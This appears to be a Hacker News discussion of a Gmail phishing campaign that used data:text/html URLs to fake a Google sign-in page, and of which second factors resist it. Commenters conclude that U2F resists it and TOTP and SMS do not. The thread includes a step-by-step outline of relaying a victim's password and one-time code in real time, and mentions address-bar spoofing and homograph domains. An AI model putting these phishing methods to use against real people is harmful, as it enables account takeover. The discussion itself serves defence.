[–] colinbartlett link

Requiring 2-factor auth would prevent this from being exploitable, right? Probably impossible in a school environment but in an enterprise situation, more palatable perhaps.

reply

[–] gaia link

2FA would make it harder to exploit, but phishing attacks are getting fancier. They capture the 2FA code you enter and immediately start a session elsewhere with your password and 2FA. Hardware 2FA, a security key, (such as a Yubikey) is the only likely way to prevent phishing (excluding targets of state actors) https://support.google.com/accounts/answer/6103523?hl=en

reply

[–] fnl link

> They capture the 2FA code

How can that be done? That's between my phone and Google, so how can they "listen in" on that?

reply

[–] putlake link

The phishing site will ask you for your 2FA code and then enter it on the real Google login page.

reply

[–] smeehee link

Google can prompt you to confirm the login via your phone. It appears to work well: there's a time-out, and this time-out is also triggered if a second login attempt is made in parallel (and reaches the confirmation stage).

So… whichever login attempt gets to confirmation stage last wins (not relevant in this situation), and the confirmation screen on (at least) my phone does not indicate anything regarding location (which is highly relevant).

This looks a little weaker than TOTP (you're basically trading a little security for the convenience of not entering a code while keeping the second factor) and a lot weaker than U2F.

reply

[–] acchow link

Why would a yubikey prevent this? They can still send the 2FA code to Google to start your session...

reply

[–] jlebar link

No, they cannot with the U2F protocol (as implemented by yubikey).

The simplified version is, Google sends the browser a one-time key, which the browser forwards to the HW token to sign with its private key. Then the browser sends this back to the web server to verify, using its copy of the HW token's public key.

This would be vulnerable to MITM attacks, as you say.

So what the protocol actually does is concatenate the nonce sent by the web server with the origin of the web page as seen by the browser and have the HW token sign that. This way the server can verify that the HW token signed the right nonce for the right origin.

See https://docs.google.com/document/d/1SjCwdrFbVPG1tYavO5RsSD1Q..., search for "origin".

reply

[–] acchow link

Oh I think I've never used this feature with my Yubikey - it's just been essentially an external keyboard that types rather quickly.

reply

[–] AlexCoventry link

It's only available on newer yubikeys.

reply

[–] jamescrowley link

It's a different protocol. Not an expert but as I understand it U2F isn't totally out of band - the browser communicates the URL so the token you give wouldn't be accepted by Google when it is replayed

reply

[–] jamescrowley link

@extrapickles describes it better further down: https://news.ycombinator.com/item?id=13376402

reply

[–] shimon_e link

> Hardware 2FA, a security key, (such as a Yubikey) is the only likely way to prevent phishing For now.

reply

[–] undefined link
[deleted]

reply

[–] semi-extrinsic link

Or manual challenge-response, like some internet banking tokens have.

reply

[–] Jarwain link

My school is actually rolling out optional 2-factor auth. I'm not a fan of the system they use^, but it's neat that a University is taking advantage of some security best practices.

^Instead of using "standard" 2-factor that generates a code on-the-fly within an app like GAuth or Authy, users receive a text message with 10 codes. The first digit of every code increases sequentially (0972,1042,2512,etc), must be used in that order (0 code on first login, 1 code on second, etc.), and the page informs the user which number they're on.

reply

[–] jonoberheide link

Sorry to hear about your experience, Jarwain!

Duo offers a choice of authentication methods, depending on the usability and security requirements of your application or organization.

Duo Push is actually one of the easiest (and most secure) authentication methods, as one of the commenters pointed out:

https://www.youtube.com/watch?v=tPLxe9HUDjY

It might be worth pinging your IT/security dept to ask about enabling Duo Push as an option or to change the policy for SMS passcodes (eg. you can just have one passcode sent instead of ten).

- Jon Oberheide, Co-Founder & CTO @ Duo

reply

[–] Bamberg link

Duo does work as advertised, and my uni uses it, but the privacy policy allows for a lot of personal data collection.

tldr: "Duo Security does not sell, rent, or trade and, except as described in this Privacy Policy, does not share any Personal Information with third parties for their promotional purposes." But Duo still collects A LOT of data on you.

From the policy: "Device-Specific Information: We also collect device-specific information (e.g. mobile and desktop) from you in order to provide the Services. Device-specific information includes:

attributes (e.g. hardware model, operating system, web browser version, as well as unique device identifiers and characteristics (such as, whether your device is “jailbroken,” whether you have a screen lock in place and whether your device has full disk encryption enabled)); connection information (e.g. name of your mobile operator or ISP, browser type, language and time zone, and mobile phone number); and device locations (e.g. internet protocol addresses and Wi-Fi). We may need to associate your device-specific information with your Personal Information on a periodic basis in order to confirm you as a user and to check the security on your device."

The policy continues to state that Duo may use this data for analytic/advertising purposes (although only in-house) as well as to comply with legal requests, subpoenas, NSLs etc.

Duo isn't collecting your data for nefarious purposes or to sell it to other companies but they still are collecting A LOT of it. Other two factor methods, like the one's used by Google and Facebook, allow clients to install their own code generators that don't collect personal data or even need access to the internet. Of course these methods don't have push requests that you can just approve rather than type in the code.

reply

[–] tripzilch link

also, if it's a US company and it ever goes bankrupt/sells its assets, third party buyers aren't bound by any privacy policy whatsoever. yes, this is crazy and it means US privacy policies are basically meaningless; best just don't give them your data, but what can you do. personally I believe that collecting the data and pretending a privacy policy makes it okay, is nefarious by itself already.

reply

[–] jonoberheide link

I think that's a fair read. The primary use of that data is for security use cases. Eg. if you're coming from an out-of-date browser or have risky Java/Flash plugin versions, we can notify you to update/remediate.

Another way to look at it: We collect security-relevant information on your device, but not your _personal_ data. In other words, we don't collect your email, photos, contacts, user-generated data, etc.

reply

[–] samch link

I'm at a large research university, and we use Duo across the institution. It really does work as advertised. The Duo Push feature combined with my iPhone's TouchID is very convenient (Duo Push also works on other devices).

Most importantly to me, though, the system has thus far been completely reliable. I haven't yet heard of a single case where somebody couldn't log in because of Duo. I'm not sure what our enterprise agreement is / how much this all costs, but it's a very good system for us.

reply

[–] paulmd link

cc: @jonoberheide

My Duo hardware token (the code generator with the button and the LCD) tends to "desynchronize" after long periods where you don't use it. The internal clock gets off, so it drifts in what token it returns vs what the server thinks it should be returning, and then it stops working.

Normally, if you log in on a regular basis the server corrects for this drift. There is probably a sliding window of N valid keys (say 10) and using one of them tells the server what the internal clock state is. But if you don't use it for a long time (more than 30 days in my experience), the clock drifts, you start going outside the window and it refuses to let you log in.

If your IT desk is open, they can "resync" it by typing in a couple numbers in a row, which lets the server scan the key sequence and find where your token is.

Use-case: We don't have Duo tokens rolled out system-wide, they are only issued for admin tasks and we have separate admin accounts for these with the Duo attached. I'm an "occasional sysadmin" who administrates several stable servers that mostly don't need to be touched.

As I don't need to use it day-to-day, my key desynchronizes quite often for me, I have had it happen at least 3 times. It would be bad if I had an after-hours emergency with my Duo token, I do not trust it. The hardware tokens are not reliable, in my book.

edit: The fix for me would be for the token to automatically resynchronize on the fly. Just like the IT guys can do, but over-the-wire. If the server sees (f.ex) three sequential login attempts with valid-but-stale keys, with the proper order and timing pattern, then it accepts them and resynchronizes the key window.

To prevent replay attacks, you would also need to add a constraint that the keys be newer than one ones last used for a sucessful login, but it should be doable. You would also want to avoid causing an account lockout as you type in the invalid keys.

reply

[–] jonoberheide link

Hi Paul! I believe your token should automatically resync if you enter three consecutive correct passcodes that are outside (but forward of) the current valid window.

reply

[–] Jarwain link

Huh, I never would've expected to hear from the CTO just from making this post.

Thanks for the reply! I'll definitely get in contact with the school's OIT to figure out alternate options for authentication

reply

[–] jonoberheide link

No prob! I can't claim to be a HN veteran (/me glares at @tqbf), but if I hear people are having issues, happy to help.

reply

[–] Jarwain link

So it turns out I can still use the Duo Mobile app. I have to re-add the device. Not the most intuitive but then again I figured it out on my own -shrugs-

reply

[–] bkoehler link

I was a huge fan an evangelist of Duo up until the Duo Mobile 3.15.0 update December 13, 2016, which disabled the ability to approve Duo Push from a locked phone (lock screen, Android Wear). That change was horribly communicated and has been inadequately defended when challenged, and has shaken my faith in Duo.

reply

[–] voidlogic link

Can Duo be used to Google Authenticator or do you have to use "Duo Push"?

reply

[–] Jarwain link

Cannot use Google Authenticator. Can't even use Duo Push; this is the SMS functioniality.

I do plan on getting in contact with the schools OIT for enabling alternatives

reply

[–] intrasight link

I hadn't heard of Duo. Just looked briefly at the site. Does anyone have a TL;DR on that? Why would one use that rather than the native 2FA?

reply

[–] Bamberg link

They can send push requests that you can just approve on your mobile device, no typing in those codes. They also have backup methods that work w/o needing internet access on your phone.

I think institutions also use Duo because Duo takes care of the whole think whereas traditional 2FA isn't trivial to implement for the institution (generating tokens and all of that). At least that's what I was told by my institution when they made us start using Duo.

reply

[–] intrasight link

> takes care of the whole thing But I would have assumed that there is considerable work necessary on the backend for a web server to integrate with Duo.

reply

[–] oxguy3 link

Oh my god that's awful, what's the point of making it so counterintuitive?? I'll never understand the motivation of companies that roll their own 2FA instead of just using TOTP or Authy.

reply

[–] Jarwain link

It was probably the worst way they could have implemented 2FA; we're still vulnerable to a MITM attack.

One of the more annoying things is that the codes are sent from a random 386 number. Out of the 7+ texts I've received thus far, only 2 were from the same number.

Apparently the company they're using is named https://duo.com/

reply

[–] grivescorbett link

That's odd, we use duo at work and it's great. Every user is configured to get a push notification directly to the device which bypasses the issues with SMS.

reply

[–] Jarwain link

That requires the user to use the Duo app though, right?

I don't recall whether I had the option to use the app when I enabled MFA initially. However, after the fact, and as far as I can find, I cannot go back and enable the app.

reply

[–] grivescorbett link

That's correct, of course without having the app installed there is no option other than SMS or a hardware token.

I remember that configuring this is tricky, but I did eventually get user self enrollment configured with push being the default. Happy to dig more into my config, if you're curious: gabe@untapt.com

reply

[–] Jarwain link

Totally curious, unfortunately it'd probably go in one eye and out the other since I'm not involved in the Uni's implementation.

reply

[–] nerdponx link

Huh, I've heard good things about Duo. They're not a nobody at any rate.

reply

[–] hobarrera link

We have security experts developing 2fa techniques, and then we have these sort of people.

reply

[–] Latty link

I assume some misguided soul got told that they needed to reduce the number of texts sent to save costs, but that's horrible.

SMS for 2fa is poor to begin with. I wish people would at least implement the standard TOTP/HOTP option as well if they are going to pull stuff like that.

reply

[–] kibwen link

My university uses the same system as yours, and what's worse is that in order to install their custom 2FA app on Android you have to configure your phone to allow apps from unknown sources. So I have to choose between using SMS codes that can be intercepted or letting an entirely unvetted app run amok on my phone.

reply

[–] feld link

This is the most unintuitive approach to 2FA I've ever seen

reply

[–] striking link

That's a pretty awful method of securing anything.

Like, that would prevent me from using 2FA.

Whatever happened to standards?

reply

[–] undefined link
[deleted]

reply

[–] Jarwain link

I guess someone wanted to make a new standard (https://xkcd.com/927/)

reply

[–] dankohn1 link

No. A man-in-the-middle phishing attack can ask you for your second factor and pass it through to Gmail.

reply

[–] acdha link

This is definitely true of TOTP but U2F was designed to prevent phishing attacks by incorporating the hostname in the protocol[1], which means the attacker needs to successfully compromise SSL as well.

1. https://security.stackexchange.com/questions/71316/how-secur...

reply

[–] wopwopwop link

Very clever, thanks for sharing.

However I wouldn't want my second-factor to be attached to my browser. Seems way too volatile for me. Personally I'd rather keep TOTP and be vulnerable to time-of-use phishing.

Maybe if the browser had an OS API that a YubiKey could query...

reply

[–] acdha link

Just to extend on what jon-wood said, that's definitely the other way around: U2F is an open standard and the intelligence lives on the USB/NFC device. Any browser which implements that standard[1] can login and, especially nice for security, the browser never gets access to the keys or, with devices like the YubiKeys which require you to touch a button for each request, even the ability to authenticate without user approval.

1. Currently Chrome has this, Firefox is close (50.1 shipped it but it only works in the e10s mode), and there are extensions for Safari and older versions of Firefox.

reply

[–] wopwopwop link

sigh read my response to the other guy

reply

[–] jon-wood link

It's actually the other way round, the YubiKey (or other U2F token) has an API the browser queries, generally triggering the token requesting some sort of physical interaction.

reply

[–] wopwopwop link

I know how it is now, but that's not what I'm talking about. Currently the URL is not included in the hash, that's my point. It could be by having those two talk to each other. Who's the server and who's the client is beside my point.

reply

[–] Ajedi32 link

Huh? What are you even talking about? This comment makes no sense to me in the context of what jon-wood said.

> the URL is not included in the hash

What hash? Nobody even mentioned a hash. The crypto keys used for U2F are indeed domain-specific, if that's what you're trying to ask.

> It could be by having those two talk to each other.

Who's "those two"? And what's "it"? I'm very confused.

reply

[–] wopwopwop link

> What hash? Nobody even mentioned a hash.

I mentioned a hash. The secret is hashed together with the time. _That_ hash.

> The crypto keys used for U2F are indeed domain-specific, if that's what you're trying to ask.

I know the secret is domain-specific. What I was describing is taking the secret, and the time AND THE DOMAIN and use them to produce the hash. This would break MITM. One of the comments above me mentioned this and I run with it. But you're talking to me like you didn't read anything above....

> Who's "those two"?

Those two are the yubikey and the browser.

reply

[–] Ajedi32 link

> I mentioned a hash.

I think you're confused. You have not mentioned the word "hash" even once in this thread prior to the previous comment I replied to.

Anyway, I think you're confusing U2F with TOTP. U2F does not rely on the time at all AFAIK; it uses public key cryptography, and authenticates by signing a data structure containing the domain name of the site and a server-provided nonce (among other things).

> What I was describing is taking the secret, and the time AND THE DOMAIN and use them to produce the hash.

I think there's still some sort of disconnect here, because up until this this comment you've described nothing of the sort in this thread. Could you link the comment you're referring to where you explained all this?

> One of the comments above me mentioned this and I run with it.

If you're referring to acdha's comment about U2F, as acdha and others in this thread have explained, U2F (aka Universal 2nd Factor) is an entirely different protocol from TOTP (aka Time-based One Time Password). U2F does not use hashing or the system time in the way you seem to be envisioning, but it is also not vulnerable to phishing like TOTP is.

U2F interfaces with your browser, and uses a set of public and private keys (that is stored on the U2F device, not in your browser) to authenticate to sites in a way which can't be phished. It's not theoretical; it exists and can be used today with many popular sites, including Google, GitHub, Dropbox, and more. You just need a USB device which supports U2F (YubiKey is one, but there are many others).

reply

[–] acdha link

I think most of us are having trouble understanding exactly the question which you're trying to ask – could you try to state it clearly and precisely?

reply

[–] midgetjones link

That's assuming the attacker could log in with it before it expired, isn't it?

reply

[–] danieldk link

Yes, but as per the standard TOTP codes are valid for a window of 1 minute.

TOTP barely protects against phishing. What you want is an U2F key as the second factor. It's not like they are expensive anyway (usually 7-15 Euro) and quite some large services support U2F tokens already (Google, Dropbox, GitHub, Fastmail, etc.).

reply

[–] midgetjones link

Thanks!

Is the 1 minute window always the case? In the authenticator app, it seems like codes expire after ~30 seconds. If I wait till the last few seconds before using the code, does that make me any safer?

reply

[–] garrettr_ link

If the codes are time-based (TOTP), they are typically generated with a rolling window of 30 seconds (as you saw in Google Authenticator). The 30s rolling window is the recommended (and widely implemented) default value from the TOTP RFC [0].

It is common but not universal for sites to accept, at a given time, 1) the current U2F token, 2) the U2F token from the previous window, 3) the U2F token for the next window. This is done as a partial mitigation for potential clock skew issues on the client that's generating the TOTP codes (e.g. your phone). In practice this means every code is valid for 1m30s, although sites may customize this (with or without changing the window size, which is typically not done because that parameter must be consistent system-wide).

> If I wait till the last few seconds before using the code, does that make me any safer?

Maybe, but this is not practicable security advice. The latency of a MITM attack on a 2-factor TOTP login depends on the attack infrastructure and design, but can easily be made to be on the order of tens or hundreds or milliseconds. Reducing the window seems like it might help your security, but it can never be perfect and there is a direct tradeoff with usability because users need time to look up the codes on one device and enter them on another.

Folks often say "enable 2FA" in response to news of new and sophisticated phishing attack campaigns, but it's critical to note that most commonly deployed 2FA (TOTP, HOTP, SMS) is trivially phish-able. 2FA is not an automatic defense against phishing, although some newer designs achieve this and were created specifically with this goal in mind: U2F is a good example.

[0]: https://tools.ietf.org/html/rfc6238

reply

[–] danieldk link

The RFC recommends a time step of 30 seconds + permitting at most one previous time step for handling out of sync clocks and slow/late entry:

The validation system should compare OTPs not only with the receiving timestamp but also the past timestamps that are within the transmission delay. A larger acceptable delay window would expose a larger window for attacks. We RECOMMEND that at most one time step is allowed as the network delay.

[...]

We RECOMMEND a default time-step size of 30 seconds. This default value of 30 seconds is selected as a balance between security and usability.

Since the client's clock could be in the behind or ahead of the server's clock, I have to correct myself and the window would be 90 seconds.

One could be a bit strict and e.g. the previous time step only until 1/2-way the current time step, which would bring the window make to 60 seconds.

At any rate, all these timeframes are far to large to avoid real-time phishing attacks.

reply

[–] jpalomaki link

In some cases the server is configured to accept multiple codes (prev, current, next) to handle timesync issues between server and client (where the app is running).

reply

[–] wopwopwop link

No. How long does it take from you entering the code to the code reaching Google? A few tens of miliseconds? With a phisher in the middle it's a couple extra miliseconds.

reply

[–] Niten link

U2F would prevent this from being exploitable, but one-time password schemes like TOTP would not.

reply

[–] RedPanda250 link

Why would TOTP not suffice to prevent this exploit ?

reply

[–] extrapickles link

They can use the TOTP token to auth themselves where as U2F will not work if you are the middle-man.

U2F basically[0] signs the current URI and HTTPS key and sends it back. If there is a man-in-middle then the signatures will not match and the auth will fail.

[0]: https://developers.yubico.com/U2F/Protocol_details/Overview....

reply

[–] IanCal link

I don't think so, I'm not sure how it could.

One of the tweets points out that something like lastpass would help with this as it wouldn't allow you to autofill your password (as it's not on the google the domain), but then you could get it manually from there anyway.

reply

[–] danielbarla link

Well, when the attacker attempts to log in via the stolen credentials, they would get the 2FA check, and you would get an SMS.

Normally this would alert you to the fact that someone is logging in to your account, and would stop the attacker since they lack the 2FA one time pass. In this case though, since you've already fallen for the "I'm trying to log in to Google again", the attacker will probably fake the 2FA screen as well, and you'll merrily type it in.

reply

[–] michaelt link

1. You visit the attacker's page and give them your username and password.

2. The attacker immediately tries them, triggering an SMS to you and an 'enter SMS code' page for them.

3. The attacker shows the 'enter SMS code' page to you, and you enter the code from the SMS you just received, giving it to the attacker.

4. The attacker completes their login using the SMS code.

5. The attacker shows the user some believable error message (implying an error on Google's end, or a typo in the SMS code) then forwards the user to the legitimate Google login page.

reply

[–] danielbarla link

Yep, that's what I'm saying too. If you've fallen for providing 1FA, you'll fall for 2FA too, since you think it's legit.

reply

[–] mikeash link

Apple's 2FA for iCloud will likely avoid this if you're careful. They do a GeoIP lookup of where the request is coming from and show the approximate location of the login attempt before they show you the 2FA code. For example, when logging in legitimately from home, it'll say that there's a login attempt from the city where I live. In the likely case where the phisher's server isn't in this area, it'll show something else, and I'll know what's up.

Obviously this isn't perfect because it depends on people actually paying attention to that, and on not having too many false positives due to GeoIP failures, but it seems like a nice improvement.

Apple has a nice UI on it (no surprise, I'm sure) where they show a map centered on the location in question, but even SMS-based solutions could include a quick "Login attempt from City" along with the code.

reply

[–] cyberferret link

Apple's 2FA is good, but their geo-location needs some work. I constantly get notifications that someone located 3000km away from me is trying to log in whenever I perform a 2FA sign on.

It's enough to concern me on the odd occasion that someone is trying a MITM attack.

I am guessing it is because in Australia, quite often the central server allocating IP addresses for our major ISPs can be in a completely different city?!?

reply

[–] mikeash link

That's too bad. Do other services get it right?

reply

[–] undefined link
[deleted]

reply

[–] IanCal link

I was thinking this would be done automatially. You enter username and password, they send to google and get a 2fa request. Show you the same screen and ask for your 2FA pass, which they then send on and they're in.

Someone else mentioned U2F would work though as that's tied to the domain, but I don't really know much about that.

reply

[–] tscs37 link

Autofill should usually pull the user out of their tunnel vision and focus them on the site and what they are doing.

Not perfect but atleast they're not blindly typing in passwords.

reply

[–] hobarrera link

Probably not; the fake page can also prompt for the second factor and then quickly do the real authentication using that.

reply

[–] jdavis703 link

This is why having a warning for non-HTTPs sites is so important: http://boingboing.net/2016/11/05/chrome-is-about-to-start-wa....

reply

[–] hobarrera link

Yup, hopefully that would make a difference, though if we keep getting news like today's GoDaddy validation bug, this'll gradually lose value. :(

reply

[–] anchpop link

I don't see how that would help here. Couldn't the phishing site have HTTPS?

reply

[–] jimmaswell link

I feel like all these kinds of extra security burdens aren't worth it. If you could quantify and add up all the inconvenience caused by extra security past simple password logins, affecting all users always, it would surely be more than what would have been caused by the attacks prevented, temporarily affecting a few users.

reply

[–] jdavis703 link

What if they're able to comprise a person who works in HR who probably has copies of passports, social security numbers and other highly-sensitive PII in their email inbox? The fact is people send around all kinds of sensitive information via email, including IT/engineering who probably has discussions about various security holes they're working on patching.

reply

[–] wopwopwop link

Not really. The phisher can just ask for the second factor the same way they ask for the password.

reply

[–] angrygoat link

U2F knocks this on the head - a MITM site won't have the secret required to generate the token.

reply

[–] wopwopwop link

Wrong. The target domain asks the MITM for the secret, the MITM asks the victim for the secret, the victim gives the secret to the MITM and the MITM gives the secret to the target domain. Just like with the password.

You have no idea what you're talking about and yet you downvote first and ask questions later.

reply

[–] camtarn link

Holy crap. That is some serious ingenuity and skill being applied to the cause of evil.

reply

[–] drzaiusapelord link

>They were using bit.ly to obscure the address (in Russia).

Clicking on links from email is such an edge case its bewildering we allow any link to be routable from an email client. I'd love to see my email client block this stuff by default. There's no case for me that an email should lead me to Russia, be it via a shortener or not. Or to a IP address that is on any honeypot list or has a suspicious rating.

I think we need to rethink what is allowed to route out of emails. I can see a whitelist of legitimate and vetted companies with large warnings for anything else. A little AI would go a long way here. Maybe visit the domain, verify the site has SSL, verify its not another country, verify its not trying to impersonate sites, check reputation lists, etc. A handful of predicative rules put into a browser or email client would greatly help here.

Its clear we can't spot phishing attempts well, but we may be able to make actually visiting the phishing site as difficult as possible. Links in emails should be seen as extremely hostile by default.

reply

[–] jhardcastle link

Sysadmin at a school: we use GMail for our students and faculty, and we got hit by this hard right before the holiday break. Three employees and a handful of students all got hit by the attack within a two hour period. It's the most sophisticated attack I've seen. The attackers log in to your account immediately once they get the credentials, and they use one of your actual attachments, along with one of your actual subject lines, and send it to people in your contact list.

For example, they went into one student's account, pulled an attachment with an athletic team practice schedule, generated the screenshot, and then paired that with a subject line that was tangentially related, and emailed it to the other members of the athletic team.

They were using bit.ly to obscure the address (in Russia). We had to take our whole mail system down for a few hours while we cleaned it up.

reply

[–] IshKebab link

Ah the classic "ugh. we don't want to have to fix this, so here are some bullshit technical reasons why it's impossible and a bad idea".

reply

[–] elastic_church link

yeah but we all do this everyday to the designers

reply

[–] undefined link
[deleted]

reply

[–] undefined link
[deleted]

reply

[–] IanCal link

I'd say the data: url part is important, as it lets you construct much more plausible looking contents for the address bar. The standard "check it's google.com" would probably fail for a lot of people.

How many people really know that you can put a whole webpage in the URL?

reply

[–] timruffles link

Agreed - I think simply highlighting the data:... part of the URL with a vaguely scary colour would help.

reply

[–] mayoff link

Apple's approach in Safari is to only show the hostname in the address bar, unless the address bar has focus. This works pretty well in general (for non-power-users). Unfortunately, for a data URL, it just shows as much of the URL as fits. This may well include the phony “https://account.google.com” part of the URL and thus still mislead naive users.

reply

[–] eridius link

At the very least it'll still look different, which might hopefully make the user take a closer look. For example, for normal URLs, you never seen the https:// part (unless the address bar has focus). Even if you enable the advanced preference to show the full website address again, it still hides the https:// part.

reply

[–] jneal link

This is pretty scary. When you hear security professionals explain to laymen how to identify phishing attacks, it's almost always check the URL, make sure you're actually at google.com and not go0gle.com, or something like that.

I can't even imagine what legitimate use there is to placing an entire HTML document into the URL. Just seems like a hack someone came up with as a solution to a problem, not the right solution, but a solution nonetheless.

reply

[–] contravariant link

>I can't even imagine what legitimate use there is to placing an entire HTML document into the URL. Just seems like a hack someone came up with as a solution to a problem, not the right solution, but a solution nonetheless.

It allows you to embed data in an URL, meaning you can link to documents that aren't necessarily stored anywhere, such as generated images/text.

I suppose you could make an argument that it shouldn't be shown as a regular URL.

reply

[–] Jarwain link

Why even render the content of data:text/html in the first place?

reply

[–] soundwave106 link

To give an example, I've seen some multiplayer games with dynamic content, that use Websockets for communication with the server and update various information via data URIs. I've never seen a text/html data URI yet (mostly image transmission to be honest) but for a multi-client Websockets type application I definitely wouldn't rule out that sort of thing.

I agree that blocking the rendering of data:text/html (and any other MIME type that could be used maliciously) from the address bar is a good idea. I can't think of a valid use case for that scenario. It seems like similar attack vectors have been known for some time (https://nakedsecurity.sophos.com/2012/08/31/phishing-without...).

reply

[–] contravariant link

Because that's precisely what the 'data:' URI is supposed to do. The URI is only a description of some resource, there's no reason one description should be treated differently than any other, unless it's actually pointing to a different resource.

reply

[–] Jarwain link

Its more the idea of rendering the HTML code in this fashion does not make sense to me. Maybe print the code to the page instead of rendering it. Anything would be better than rendering the code; I can't even come up with a possible use case for that functionality, can you?

reply

[–] contravariant link

You could generate a webpage and link to it without needing to host it somewhere.

At any rate, if you allow a URI scheme that embeds the data in the URI itself it'd be very odd to arbitrarily restrict the valid MIME types. It'd be like forbidding a http URL from linking to a JPEG.

reply

[–] Jarwain link

Well in a way you're just offloading the cost of hosting that code/data in that case. Instead of hosting it yourself, the page with the link is hosting that webpage.

Well it wouldn't really be arbitrary, it'd be specifically HTML and/or JS, for security related purposes.

reply

[–] space_fountain link

Not to mention don't blobs allow us to do this now anyway?

reply

[–] e40 link

make sure you're actually at google.com and not go0gle.com

And how about the domain with a character that looks more like 'o' than '0'? There was something on HN recently about that. The example given would have completely fooled me, since it looked the same as the real domain.

reply

[–] seanp2k2 link

https://en.m.wikipedia.org/wiki/IDN_homograph_attack is what you're referencing, I believe :)

reply

[–] Magicstatic link

Interesting enough, HN itself was actually susceptible to this and it was reported by a security researcher:

https://news.ycombinator.com/security.html

reply

[–] Jarwain link

Why is data:text/html even valid or rendered to the page in the first place? I'm having trouble coming up with a valid usecase for this

reply

[–] grenoire link

It's just not treated as an exception. Works for all MIME types supported by the browser.

reply

[–] babyrainbow link

Why not just alert the user if the address bar contain something weird like this...

And also, why not do something like this even. Let the browser save screen shots of some user selected sites. Like mail login page, online banking login page etc etc and have them map to a trusted url.

After loading a page, browser should screenshot the page and use some ML magic to compare it to the stored screenshots (I mean, there are things today that can call out the names of the things in an image and even what tell they are doing, right?). When one of them matches and If the url of the current page differs from the trusted url, the user should be alerted..Something like "Hey user, this page suspiciously looks like this page that we stored, but the url is completely different. Are you sure about this?"

reply

[–] Hello71 link

that won't kill battery life at all

reply

[–] dschep link

A minor change that would help (a little) is to replace all spaces in the address bar with %20.

reply

[–] fsavard link

Or some clearly visible icon at the end of the URL bar saying "2832 more characters ->".

reply

[–] sleepybrett link

Or make the whole bar red and flashing whenever someone uses the tricks this attack uses. Specifically data.text/html and inline script tags.

reply

[–] Ajedi32 link

I mean, they're not wrong are they? Would this attack have been any less effective if instead of `data:text/html,https://accounts.google.com/...` the URL bar said `https://accounts.google.com.login.cz/...` instead?

reply

[–] xja link

That's a real shame. There are certainly things they could do to prevent images looking quite so similar to UI elements.

reply

[–] willvarfar link

And stop people emailing screen shots?

The best approach I can come up with after five seconds thought is disabling links on non-text elements.

And then they go make an anchor that is whitespace over top of a background image... so we'd also need to disable links on large expanses of empty whitespace in text when its embedded in a mail.

I should think that can likely be worked around too, however. Got any more ideas?

reply

[–] swiley link

Far better would be to not render HTML emails at all. They're an abomination and have always been causing security problems of different kinds.

reply

[–] sethrin link

> All programs will attempt to expand until they can render HTML emails. Those that cannot will be replaced by those that can.

More seriously, the expectation that emails will consist only of plain text is simply untenable. From a security standpoint this is obviously not ideal, but security and usability are opposed, and if your security scheme does not allow users to send documents with some form of markup, it will not be widely used.

reply

[–] swiley link

Emails had a form of markup before HTML emails came, it was the inspiration for markdown.

reply

[–] Mtinie link

For an "ultra security mode" that would work, but it would break a large portion of the Web's sites (as you noted, and it's easy-ish to circumvent) :/

Conceptually I like the idea of an ultra security mode for certain use cases, but ultimately it ends up making the whole web look like a bunch of plain text emails -- no JS, probably no images (unless the are somehow sandboxed and displayed from a safe local store), links are fully visible, etc.

reply

[–] xja link

I was think more of a specific mail scanning process for images that look exactly like UI elements, with some fuzzy match.

If it matches, flag it with the usual warnings.

It feels like there's at least the potential to explore options.

reply

[–] das_keyboard link

Why don't just put a little frame around embedded elements like pictures, etc? Maybe with a little icon indicating the type.

reply

[–] laumars link

That would break more legitimate HTML e-mails than the phishing it's aiming to catch. You might argue that it's worth the breakage but that would be a harder argument to sell to businesses.

Pragmatically I think Browsers disabling the rendering of data:text/html is a better approach. The breakage is minimal and it would catch more phishing attacks than just ones that originated from emails with images embedded.

reply

[–] pavel_lishin link

According to our numbers, plain emails actually perform better than HTML emails when it comes to business mailings.

reply

[–] laumars link

That's good to read but sadly that's a different point to the one I was making. Google would break a lot of legitimate emails if they make the changes to GMail that the GP was proposing. This would be an unattractive solution to Google as they are effectively breaking their "mail client" (in the broader sense of the term) in relation to their competitors and the benefits are limited to a specific type of phishing attack. So when Google way up the risk of annoying their customer base vs the securing them: this particular fix is unlikely to score high enough in the latter category to be worth the risk to the former.

reply

[–] jcranmer link

Break the image into several layers and use transparency for the non-included bits. Or you could go full Acid2-like crazy CSS to generate the image from multiple, apparently innocuous elements.

reply

[–] undefined link
[deleted]

reply

[–] tdkl link

Yeah, more people needs to get scammed, then the media will advertise how it happened and how to prevent it. It's called learning and is a sign of maturity.

reply

[–] xja link

To be frank I think that's a bit naive.

These attacks are a numbers game. There's a low cost to sending the emails and a much larger payoff.

Education helps, but it's still possible to catch people off guard, tired, new users etc.

Anything that can be done to flag these emails as spam, or increase the cost to the attacker helps.

reply

[–] gearhart link

Whilst I agree with you that the issue should be addressed by mail clients, these emails are not a numbers game in quite the same way as usual spam.

Since they rely on attachments and subject lines that are drawn from an individual user's gmail account, they have to propagate through a network, and they can't be just mass-emailed. Anything that can get the ratio of people falling for this lower than 1/<avg addressbook size> will completely eliminate the issue.

reply

[–] undefined link
[deleted]

reply

[–] timruffles link

I reported this a back in March 2016, and Google said it was not an issue.

Analysed whole attack here: https://gist.github.com/timruffles/5c76d2b61c88188e77f6

This was the response I got:

> The address bar remains one of the few trusted UI components of the browsers and is the only one that can be relied upon as to what origin are the users currently visiting. If the users pay no attention to the address bar, phishing and spoofing attack are - obviously - trivial. Unfortunately that's how the web works, and any fix that would to try to e.g. detect phishing pages based on their look would be easily bypassable in hundreds of ways. The data: URL part here is not that important as you could have a phishing on any http[s] page just as well.

reply

[–] ericleung link

The scariest part is that you knew that there was something suspicious and still [almost] got phished. There's no reason to believe anyone (technical or not) that wasn't looking out for something suspicious would have possibly avoided the attack.

Pretty nasty phishing attempt, way more subtle than past attacks.

reply

[–] scandox link

Had the same exact experience in August.

Amazing thing was I KNEW the email was phishing. I was asked to look at it by someone internally who was suspicious. I forwarded it to a Gmail account I use for dodgy items. I fired up a VM and logged in to the Gmail account. I looked at the email. I briefly examined the raw message (too briefly). Then I clicked on what I still thought was a Google Drive attachment.

My first thought was "oh I've been logged out of Gmail for some reason". I was just about to login again when I decided to double check the URL and finally saw what was going on.

I think most normal users would be very vulnerable to this. It's very subtle. Luckily the guy in accounts is paranoid.

reply

[–] cyberferret link

Yes - I am vigilant to almost a paranoid level, but one day a phishing email came from "Australia Post" purporting to be a missed delivery notification on a day that I was expecting a delivery and thought I had missed the driver.

I was in a hurry, and frustrated and was a millisecond away from clicking the link when some gut feeling told me that something was not right. Closest I've come to date, and it worried me.

EDIT: Sorry, I meant to respond to @soneca below, as this relates to phishing emails arriving with impeccable timing...

reply

[–] soneca link

